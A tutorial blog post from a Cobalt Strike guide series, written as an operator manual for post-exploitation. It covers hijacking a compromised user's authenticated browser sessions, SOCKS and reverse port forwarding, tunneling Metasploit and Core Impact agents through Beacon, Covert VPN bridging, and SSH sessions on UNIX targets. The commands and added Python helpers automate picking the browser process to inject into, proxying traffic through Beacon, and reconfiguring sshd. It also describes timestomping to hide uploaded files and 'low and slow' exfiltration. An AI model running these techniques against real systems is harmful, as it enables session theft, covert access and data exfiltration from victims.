CobaltStrike Guide. #5 Browser pivoting and SSH sessions

15 June 2023 19 minutes Author: Lady Liberty

Mastery of Browser Pivoting and SSH sessions with CobaltStrike

This part of the CobaltStrike guide covers Browser Pivoting and SSH sessions. Browser Pivoting lets an operator ride the authenticated web sessions of a compromised user's browser, so that requests are made by that browser, with its cookies and session state. The built-in SSH client lets Beacon manage UNIX targets and route their traffic back through the existing Beacon chain, without new direct connections to your command-and-control infrastructure.

The sections below give the setup steps, the Beacon commands and the caveats for each, together with the pivoting features they rely on: SOCKS proxies, reverse port forwards, pivot listeners and Covert VPN. Practical examples and step-by-step instructions are included so that you can reproduce each technique in a lab before using it on an engagement.

Browser Pivoting

Malware such as Zeus and its variants inject themselves into a user's browser to steal banking information. This is a man-in-the-browser attack, so called because the attacker's code sits inside the user's browser, between the user and the sites they visit.

Overview

Man-in-the-browser malware uses two approaches to steal banking information. Either it intercepts form data as it is sent to the server (for example, the malware may hook PR_Write in Firefox to intercept HTTP POST data before it is encrypted), or it injects JavaScript into certain web pages to make the user think the site is asking for information that the attacker actually wants.

Cobalt Strike offers a third approach to man-in-the-browser attacks: hijacking authenticated web sessions, all of them. Once a user logs onto a site, an attacker may ask the user's browser to make requests on their behalf. Since the user's browser is making the request, it automatically re-authenticates to any site the user is already logged into. I call this Browser Pivoting, because the attacker pivots their browser through the compromised user's browser.

Figure 40. Browser Pivoting in action

Cobalt Strike's Browser Pivoting feature for Internet Explorer injects an HTTP proxy server into the compromised user's browser. Do not confuse this with changing the user's proxy settings. This proxy server does not affect how the user gets to a site. Rather, the proxy server is available to the attacker: all requests that pass through it are fulfilled by the user's browser, with that browser's cookies and session state.

Setup

To set up Browser Pivoting, go to [beacon] -> Explore -> Browser Pivot. Choose the Internet Explorer instance to inject into. You may also decide which port to bind the Browser Pivoting proxy server to.

Figure 41. Start Browser Pivoting

Keep in mind that the process you inject into matters. Inject into Internet Explorer to inherit the user's authenticated web sessions. Modern versions of Internet Explorer spawn each tab in its own process. If the target uses a modern version of Internet Explorer, you must inject into a process associated with an open tab to inherit session state. Which tab process does not matter (child tabs share session state).

Identify Internet Explorer tab processes by looking at the PPID value in the Browser Pivoting setup dialog.

If the PPID refers to iexplore.exe, the process is a tab process. Cobalt Strike shows a checkmark next to the processes it believes you should inject into.
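As an added example (not part of the original guide or of Cobalt Strike itself), the tab-process rule above in Python: parse a constructed Beacon ps-style listing, keep the iexplore.exe processes whose parent is also iexplore.exe, and build the browserpivot command for one of them. The column layout of the sample and the browserpivot [pid] [x86|x64] syntax are assumptions here; check them against your own Beacon's ps and help output.

```python
# Constructed sample of a Beacon `ps` listing. Assumption: whitespace-separated
# PID, PPID, Name and Arch columns; check the column order against your own
# Beacon's ps output before relying on the parser.
SAMPLE_PS = """\
 PID   PPID  Name            Arch
 ---   ----  ----            ----
 4     0     System          x64
 672   4     smss.exe        x64
 2468  1120  explorer.exe    x64
 3124  2468  iexplore.exe    x64
 3308  3124  iexplore.exe    x86
 3412  3124  iexplore.exe    x86
 3520  2468  chrome.exe      x64
"""


def parse_ps(ps_text: str) -> dict:
    """Return {pid: (ppid, name, arch)}, skipping header and separator rows."""
    procs = {}
    for line in ps_text.splitlines():
        parts = line.split()
        if len(parts) < 4 or not parts[0].isdigit() or not parts[1].isdigit():
            continue
        pid, ppid, name, arch = int(parts[0]), int(parts[1]), parts[2], parts[3]
        procs[pid] = (ppid, name, arch)
    return procs


def ie_tab_processes(ps_text: str) -> list:
    """PIDs (with arch) of iexplore.exe processes whose parent is also
    iexplore.exe: the per-tab processes that hold the session state.
    The top-level frame process (parent explorer.exe) is deliberately excluded."""
    procs = parse_ps(ps_text)
    tabs = []
    for pid, (ppid, name, arch) in procs.items():
        if name.lower() != "iexplore.exe":
            continue
        parent = procs.get(ppid)
        if parent is not None and parent[1].lower() == "iexplore.exe":
            tabs.append((pid, arch))
    return tabs


def browserpivot_command(ps_text: str):
    """Pick any one tab process (child tabs share session state) and build the
    Beacon command. The syntax browserpivot [pid] [x86|x64] is assumed here;
    confirm it with `help browserpivot` in your Beacon console."""
    tabs = ie_tab_processes(ps_text)
    if not tabs:
        return None          # no IE tab open: nothing to inherit a session from
    pid, arch = tabs[0]
    return f"browserpivot {pid} {arch}"
```

Note that the frame process (PID 3124 in the sample, whose parent is explorer.exe) is skipped on purpose: injecting there does not inherit a tab's session state. The arch column is carried along because the injected proxy must match the bitness of the tab process.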

After setting up Browser Pivoting, configure your web browser to use the Browser Pivoting proxy server. Remember that Cobalt Strike's Browser Pivoting server is an HTTP proxy, not a SOCKS proxy.

Figure 42. Browser proxy configuration

Use

Once Browser Pivoting is running, you can browse the web as the target user. Keep in mind that the Browser Pivoting proxy presents its own SSL certificate for the SSL-enabled sites you visit. This is necessary for the technique to work.

The Browser Pivoting proxy will ask you to add a host to your browser's trust store when it detects an SSL error. Add these hosts to the trust store and press refresh to let SSL-protected sites load properly.

If your browser pins the target site's certificate, you may find it impossible to get the browser to accept the Browser Pivoting proxy's SSL certificate. This is a nuisance. One option is to use a different browser. The open source Chromium browser has a command-line option to ignore all certificate errors, which is ideal for use with the Browser Pivoting feature:

chromium --ignore-certificate-errors --proxy-server=[host]:[port]

This command is also available under View -> Proxy Pivots: highlight the HTTP proxy entry and press the Tunnel button. To stop the Browser Pivoting proxy, type browserpivot stop in the Beacon console.

If the user closes the tab you are working from, you will need to reconnect to the Browser Pivoting proxy server. The Browser Pivot tab will warn you when it cannot connect to the proxy server.

NOTE: OpenJDK 11 has a bug in its TLS implementation that causes ERR_SSL_PROTOCOL_ERROR (Chrome/Chromium) and SSL_ERROR_RX_RECORD_TOO_LONG (Firefox) when interacting with https:// sites through the pivot. If you encounter these errors, downgrade your team server to Oracle Java 1.8 or OpenJDK 10.

How Browser Pivoting works

Internet Explorer delegates all communication to the WinINet library. This library, which any application may use, manages cookies, SSL sessions and server authentication on behalf of its users. Cobalt Strike's Browser Pivoting takes advantage of the fact that WinINet manages authentication and re-authentication transparently on a per-process basis.

By injecting Cobalt Strike's Browser Pivoting technology into the user's Internet Explorer instance, you get this transparent re-authentication for free.

Pivoting

What is Pivoting?

Pivoting, for the purposes of this guide, means turning a compromised system into a hop point for other attacks and tools. Beacon provides several pivoting options. For each of them, you will want to make sure your Beacon is interactive. An interactive Beacon checks in multiple times each second. Use the sleep 0 command to make your Beacon interactive.

SOCKS proxy

Go to [beacon] -> Pivoting -> SOCKS Server to set up a SOCKS4a or SOCKS5 proxy server on your team server. Or, use socks 8080 to start a SOCKS proxy on port 8080 (or any other port of your choosing).

All connections that pass through this SOCKS server are turned into connect, read, write and close tasks for the associated Beacon to execute. You may tunnel through SOCKS with any type of Beacon (even an SMB Beacon).

Beacon's HTTP data channel is the most responsive for pivoting. If you need to pivot traffic over DNS, use the DNS TXT record communication mode.

Use socks [port] [socks4 | socks5] [enableNoAuth | disableNoAuth] [user] [password] [enableLogging | disableLogging] to start a SOCKS4a (the default if no server version is given) or SOCKS5 server on the specified port. The server relays connections through this Beacon.

A SOCKS5 server may be configured for NoAuth (the default), username/password authentication, and optional logging.

The SOCKS5 server currently supports neither GSSAPI authentication nor IPv6. To see the SOCKS servers that are currently set up, go to View -> Proxy Pivots. Use socks stop to stop the SOCKS servers and terminate existing connections. Traffic is not relayed while Beacon is asleep. To reduce latency, change the sleep time with the sleep command.
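An added example, not from the original guide, of what the beacon SOCKS server actually receives from a tool such as proxychains: the client side of a SOCKS4a CONNECT (the default server type) and of a SOCKS5 username/password CONNECT, plus the server-side parse that recovers the host and port Beacon will be tasked to connect to. The hostnames, credentials and reply bytes are constructed for illustration.

```python
import struct

SOCKS4_GRANTED = 0x5A                  # SOCKS4 reply code: request granted
SOCKS5_NO_AUTH, SOCKS5_USERPASS = 0x00, 0x02
SOCKS4A_MARKER = b"\x00\x00\x00\x01"   # DSTIP 0.0.0.x: "a hostname follows"


def socks4a_connect(host: str, port: int, userid: str = "") -> bytes:
    """Client -> server. SOCKS4a CONNECT: the 0.0.0.1 DSTIP tells the server a
    hostname follows the userid, so name resolution happens proxy-side (here,
    by Beacon inside the target network) rather than on the operator's box."""
    return (struct.pack("!BBH4s", 4, 1, port, SOCKS4A_MARKER)
            + userid.encode() + b"\x00"
            + host.encode() + b"\x00")


def parse_socks4_request(req: bytes):
    """Server side: recover the (host, port) that Beacon gets a connect task for.
    Handles both plain SOCKS4 (IPv4 literal) and the SOCKS4a hostname form."""
    vn, cd, port, ip = struct.unpack("!BBH4s", req[:8])
    if vn != 4 or cd != 1:
        raise ValueError("not a SOCKS4 CONNECT request")
    _userid, _, rest = req[8:].partition(b"\x00")
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:
        host, _, _ = rest.partition(b"\x00")
        return host.decode(), port
    return ".".join(str(b) for b in ip), port


def socks4_reply_ok(reply: bytes) -> bool:
    """Server -> client: 8 bytes, VN=0 and CD=0x5A mean the connect succeeded."""
    vn, cd, _port, _ip = struct.unpack("!BBH4s", reply[:8])
    return vn == 0 and cd == SOCKS4_GRANTED


def socks5_greeting(use_password: bool) -> bytes:
    """Client -> server, method negotiation. Offer only the method the beacon
    SOCKS5 server was started with (enableNoAuth, or a user/password pair)."""
    method = SOCKS5_USERPASS if use_password else SOCKS5_NO_AUTH
    return struct.pack("!BBB", 5, 1, method)


def socks5_userpass(user: str, password: str) -> bytes:
    """Client -> server, RFC 1929 sub-negotiation; sent only if the server
    answered the greeting with method 0x02."""
    u, p = user.encode(), password.encode()
    return b"\x01" + bytes([len(u)]) + u + bytes([len(p)]) + p


def socks5_connect(host: str, port: int) -> bytes:
    """Client -> server, CONNECT with ATYP=0x03 (domain name) so the name is
    again resolved proxy-side."""
    h = host.encode()
    return struct.pack("!BBBB", 5, 1, 0, 3) + bytes([len(h)]) + h + struct.pack("!H", port)


def socks5_reply_ok(reply: bytes) -> bool:
    """Server -> client: VER=5 and REP=0x00 mean success."""
    return len(reply) >= 2 and reply[0] == 5 and reply[1] == 0


def client_messages(host: str, port: int, user=None, password=None):
    """Everything the client sends, in order, for a SOCKS4a server (no
    credentials) or a SOCKS5 server with username/password enabled."""
    if user is None:
        return [socks4a_connect(host, port)]
    return [socks5_greeting(True), socks5_userpass(user, password), socks5_connect(host, port)]
```

The point of the 0.0.0.1 marker and of ATYP=0x03 is that the hostname travels to the proxy unresolved. If a tool resolves names locally (plain SOCKS4, or proxychains without proxy_dns), internal hostnames will fail to resolve on your machine, or worse, leak DNS queries outside the pivot.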

Proxychains

The proxychains tool forces a third-party program to use a SOCKS proxy that you designate. You may use proxychains to force third-party tools through Cobalt Strike's SOCKS server. To learn more about proxychains, visit http://proxychains.sourceforge.net/.

Metasploit

You may also tunnel Metasploit Framework exploits and modules through Beacon. Create a Beacon SOCKS proxy (as described above) and paste the following into the Metasploit Framework console:

setg Proxies socks4:<team server IP>:<proxy port>
setg ReverseAllowProxy true

These commands tell the Metasploit Framework to apply your Proxies option to all modules run from that point on. Once you are done pivoting through Beacon this way, use unsetg Proxies to stop this behavior.

If you find it hard to remember all of the above, go to View -> Proxy Pivots. Highlight the proxy pivot you set up and press Tunnel. This button provides the setg Proxies syntax needed to tunnel the Metasploit Framework through your Beacon.

Reverse port forward

The following commands are available:

rportfwd – Use this command to set up a reverse port forward through Beacon. The rportfwd command binds a port on the compromised target. Any connection to this port causes your Cobalt Strike team server to initiate a connection to the forward host/port and relay traffic between the two connections. Cobalt Strike tunnels this traffic through Beacon.

rportfwd syntax: rportfwd [bind port] [forward host] [forward port]

rportfwd_local – Use this command to set up a reverse port forward through Beacon with a twist: this feature initiates the connection to the forward host/port from your Cobalt Strike client rather than from the team server. The forwarded traffic is carried over your Cobalt Strike client's connection to the team server.

rportfwd stop [bind port] – Used to disable reverse port forward.

Spawning and tunneling

Use the spunnel command to spawn a third-party tool in a temporary process and create a reverse port forward for it. Syntax: spunnel [x86 or x64] [controller host] [controller port] [/path/to/agent.bin]. This command assumes the agent file is position-independent shellcode (usually the raw output of another offensive framework). The spunnel_local command is similar, except that it initiates the connection to the controller from your Cobalt Strike client. spunnel_local traffic is carried over your Cobalt Strike client's connection to the team server.

Agent Deployment: Interaction with Core Impact

The spunnel commands were designed specifically to tunnel a Core Impact agent through Beacon. Core Impact is a penetration testing tool and exploit framework, also available under license from HelpSystems at https://www.coresecurity.com/products/core-impact.

To export a raw agent file from Core Impact:

  1. Go to the Modules tab in the Core Impact UI.

  2. Search for Package and Register Agent.

  3. Double-click this module.

  4. Change Platform to Windows.

  5. Change Architecture to x86-64.

  6. Change Binary Type to raw.

  7. Click Destination File and press ... to choose where to save the output.

  8. Go to Advanced.

  9. Change Encrypt Code to false.

  10. Go to Agent Connection.

  11. Change Connection Method to Connect from Target.

  12. Change Connect Back Hostname to 127.0.0.1.

  13. Change Port to some value (e.g., 9000) and make a note of it. Press OK.

The above steps will create the Core Impact agent as a raw file. You may use spunnel x64 or spunnel_local x64 to run this agent and tunnel it back to Core Impact.

We often use Cobalt Strike on Internet-facing infrastructure and Core Impact on a local Windows virtual machine. This is why spunnel_local exists. We recommend running the Cobalt Strike client on the same Windows system that Core Impact is installed on.

In this setup, you can run spunnel_local x64 127.0.0.1 9000 c:\path\to\agent.bin. Once the connection is established, you will hear the famous “Agent Deployed” wav file play.

With a Core Impact agent on target, you have the tools to escalate privileges, scan and gather information with many modules, launch remote exploits, and chain other Core Impact agents through Beacon connections.

Pivot Listener

It is good practice to limit the number of direct connections from the target network to your command-and-control infrastructure. A pivot listener lets you create a listener that is bound to a Beacon or SSH session. This way, you can create new reverse sessions without more direct connections to your command-and-control infrastructure.

To set up a pivot listener, go to [beacon] -> Pivoting -> Listener... This opens a dialog where you define a new pivot listener.

Figure 43. Setting up a pivot listener

The pivot listener binds to the port in the Listen Port field, on the session chosen in the Session field. The Listen Host value configures the address your reverse TCP payload will use to connect to this listener.

Right now, the only payload option is windows/beacon_reverse_tcp. This is a listener without a stager, which means you cannot use this payload with the attacks and workflows that expect a stager. You may export a stageless payload and run it to deliver the reverse TCP payload.

Pivot listeners do not change the pivot host's firewall configuration. If the pivot host has a firewall, it may interfere with your listener. It is your responsibility, as the operator, to anticipate this situation and take the right steps to deal with it.

To remove a pivot listener, go to Cobalt Strike -> Listeners and remove the listener there. Cobalt Strike will send a task to tear down the listening socket if the session is still reachable.

Covert VPN

VPN Pivoting is a flexible way to tunnel traffic without the limitations inherent in Proxy Pivoting. Cobalt Strike offers VPN Pivoting through its Covert VPN feature. Covert VPN creates a network interface on the Cobalt Strike system and bridges that interface into the target's network.

How to deploy

To activate Covert VPN, right-click on the compromised host and go to [beacon] -> Pivoting -> Deploy VPN. Select the remote interface you want Covert VPN to bind to. If no local interface exists yet, press Add to create one.

Figure 44. Covert VPN deployment

Check the Clone host MAC address box to give your local interface the same MAC address as the remote interface. It is safest to leave this option checked. Press Deploy to start the Covert VPN client on the target. Covert VPN deployment requires administrator access.

Once the Covert VPN interface is active, you may use it like any physical interface on your system. Use ifconfig to configure its IP address. If your target network has a DHCP server, you may request an address from it with your operating system's built-in tools.

Interface management

To manage Covert VPN interfaces, go to Cobalt Strike -> VPN Interfaces. Here Cobalt Strike shows the Covert VPN interfaces, their configuration, and the number of bytes sent and received through each interface.

Highlight an interface and press Remove to destroy the interface and close the remote Covert VPN client. Covert VPN removes its temporary files on reboot and automatically undoes its system changes right away. Press Add to configure a new Covert VPN interface.

Figure 45. Setting up a Covert VPN interface

Interface settings

Covert VPN interfaces consist of a network tap and a channel to carry Ethernet frames through. To configure an interface, choose an interface name (this is what you will manipulate with ifconfig later) and a MAC address.

You must also configure the Covert VPN channel for your interface. Covert VPN can carry Ethernet frames over a UDP connection, a TCP connection, ICMP, or the HTTP protocol. The TCP (Reverse) channel has the target connect to your Cobalt Strike instance. The TCP (Bind) channel has Cobalt Strike tunnel the VPN through Beacon.

Cobalt Strike will set up and manage communication with the Covert VPN client based on the local port and channel you select.

The Covert VPN HTTP channel makes use of the Cobalt Strike web server. You may host other web applications and multiple Covert VPN HTTP channels on the same port.

For best performance, use the UDP channel. It has the least overhead compared with the TCP and HTTP channels. Use the ICMP, HTTP, or TCP (Bind) channels if you need to get past a restrictive firewall.

Although Covert VPN has the advantage of flexibility, whether to use VPN Pivoting or Proxy Pivoting depends on the situation. Covert VPN requires administrator access; Proxy Pivoting does not. Covert VPN creates a new communication channel; Proxy Pivoting does not. You should use Proxy Pivoting first and move to VPN Pivoting only when it is necessary.

SSH sessions

SSH client

Cobalt Strike controls UNIX targets with a built-in SSH client. This SSH client receives tasks from, and routes its output through, a parent Beacon. Right-click on a target and go to Login -> ssh to authenticate with a username and password. Go to Login -> ssh (key) to authenticate with a key.

From the Beacon console, use ssh [pid] [arch] [target] [user] [password] to inject into the specified process, start the SSH client there, and attempt to connect to the specified target. Use ssh [target] [user] [password] (without the [pid] and [arch] arguments) to spawn a temporary process for the SSH client and attempt to connect to the specified target.

You may also use ssh-key [pid] [arch] [target:port] [user] [/path/to/key.pem] to inject into the specified process, start the SSH client there, and attempt to connect to the specified target with a key. Use ssh-key [target:port] [user] [/path/to/key.pem] (without the [pid] and [arch] arguments) to spawn a temporary process for the SSH client and attempt to connect to the specified target.

NOTE: The key file must be in PEM format. If the file is not in PEM format, make a copy of the file and convert the copy using the following command: /usr/bin/ssh-keygen -f [/path/to/copy] -e -m pem -p.

These commands start Cobalt Strike's SSH client. The client reports any connection or authentication issues to the parent Beacon. If the connection succeeds, you will see a new session in Cobalt Strike's display. This is an SSH session. Right-click on this session and select Interact to open the SSH console. Type help to see a list of commands the SSH session supports. Type help followed by a command name to get more information about that command.

Execution of commands

The shell command runs the command and arguments you specify. Commands that you run block the SSH session for up to 20 seconds, after which Cobalt Strike puts the command in the background. Cobalt Strike reports output from these long-running commands as it becomes available.

Use sudo [password] [command + arguments] to attempt to run the command with sudo. This alias requires the target's sudo command to accept the -S flag (read the password from standard input). The cd command changes the SSH session's current working directory. The pwd command shows the current working directory.

Uploading and downloading files

The following commands are available:

download – This command downloads the requested file. You do not need quotes around a filename with spaces. Beacon is built for “low and slow” exfiltration of data. At each check-in, Beacon downloads a fixed chunk of each file it is tasked to get. The size of this chunk depends on the current data channel. The HTTP and HTTPS channels pull data in 512 KB chunks.

downloads – Use this command to see the list of file downloads in progress for this Beacon.

cancel – Type this command followed by a filename to cancel a download that is in progress. You may use wildcards with this command to cancel multiple downloads at once.

upload – This command uploads a file to the host.

timestomp – When you upload a file, you will sometimes want to update its timestamps so that it blends in with the other files in the same folder. The timestomp command does this: it sets the modified, accessed and created times of one file to match those of another file.

Go to View -> Downloads in Cobalt Strike to see the files your team has downloaded so far. Only completed downloads show up in this tab.

Downloaded files are stored on the team server. To bring files back to your system, highlight them and press Sync Files. Cobalt Strike then downloads the selected files to a folder of your choosing on your system.

Peer C2

SSH sessions can control TCP Beacons. Use the connect command to assume control of a TCP Beacon that is waiting for a connection. Use the unlink command to disconnect a TCP Beacon session.

Go to [session] -> Listeners -> Pivot Listener... to set up a pivot listener bound to this SSH session. This lets a compromised UNIX target receive reverse TCP Beacon sessions. This option requires the SSH daemon's GatewayPorts option to be set to yes or clientspecified.

SOCKS Pivoting and Reverse Port Forward

NOTE: Type help in the SSH session console to see the available commands. Type help followed by a command name for detailed help.

socks – Use this command to create a SOCKS server on your team server that forwards traffic through the SSH session. The rportfwd command likewise creates a reverse port forward that routes traffic through the SSH session and your Beacon chain.

There is one caveat: the rportfwd command asks the SSH daemon to bind the port on all interfaces. The SSH daemon will most likely override this and force the port to bind to localhost only. You need to change the SSH daemon's GatewayPorts option to yes or clientspecified.
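An added example (not from the original guide) for the GatewayPorts caveat, which applies both to a pivot listener bound to an SSH session and to rportfwd through it: read the global section of an sshd_config, report whether a remote forward would bind to all interfaces, and produce a corrected config. The two sshd_config samples are constructed; the first-value-wins rule and the Match-block handling follow OpenSSH's documented behavior.

```python
# Constructed sshd_config samples (assumption: real configs vary). Two OpenSSH
# rules this check relies on: the first value seen for a keyword wins, and
# lines after a "Match" directive apply only to matching connections, so the
# global value is settled before the first Match block.
SSHD_DEFAULT = """\
Port 22
#GatewayPorts no
PermitRootLogin no
"""

SSHD_FIXED = """\
Port 22
GatewayPorts clientspecified
Match User deploy
    GatewayPorts no
"""

ALLOWS_REMOTE_BIND = ("yes", "clientspecified")


def effective_gateway_ports(config_text: str) -> str:
    """Global GatewayPorts value: 'no' (OpenSSH default), 'yes' or 'clientspecified'."""
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()                # drop comments
        if not line:
            continue
        parts = line.replace("=", " ").split(None, 1)      # "Key value" or "Key=value"
        keyword = parts[0].lower()
        if keyword == "match":
            break                                          # conditional section begins
        if keyword == "gatewayports" and len(parts) == 2:
            return parts[1].strip().lower()                # first occurrence wins
    return "no"


def rportfwd_binds_all_interfaces(config_text: str) -> bool:
    """rportfwd asks sshd to bind the remote port on all interfaces; sshd honours
    that only with GatewayPorts yes or clientspecified, otherwise it is loopback-only."""
    return effective_gateway_ports(config_text) in ALLOWS_REMOTE_BIND


def gateway_ports_fix(config_text: str) -> str:
    """Return a config whose global GatewayPorts is clientspecified: rewrite the
    first global GatewayPorts line, or insert one before the first Match block
    (or at the end). A config that already works is returned unchanged."""
    if rportfwd_binds_all_interfaces(config_text):
        return config_text
    fixed_line = "GatewayPorts clientspecified"
    out, done, in_match = [], False, False
    for line in config_text.splitlines():
        low = line.strip().lower()
        if low.startswith("match"):
            if not done:
                out.append(fixed_line)
                done = True
            in_match = True
        elif not in_match and not done and low.startswith("gatewayports"):
            out.append(fixed_line)
            done = True
            continue
        out.append(line)
    if not done:
        out.append(fixed_line)
    return "\n".join(out) + "\n"
```

On a live target, sshd -T | grep -i gatewayports prints the effective value without parsing the file yourself. Changing the setting requires root and a reload of sshd, so on a host you do not fully control it is usually simpler to forward to a port that stays on localhost and reach it from that host, or to use a pivot listener on a Beacon instead.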

Thanks to various open source guides.
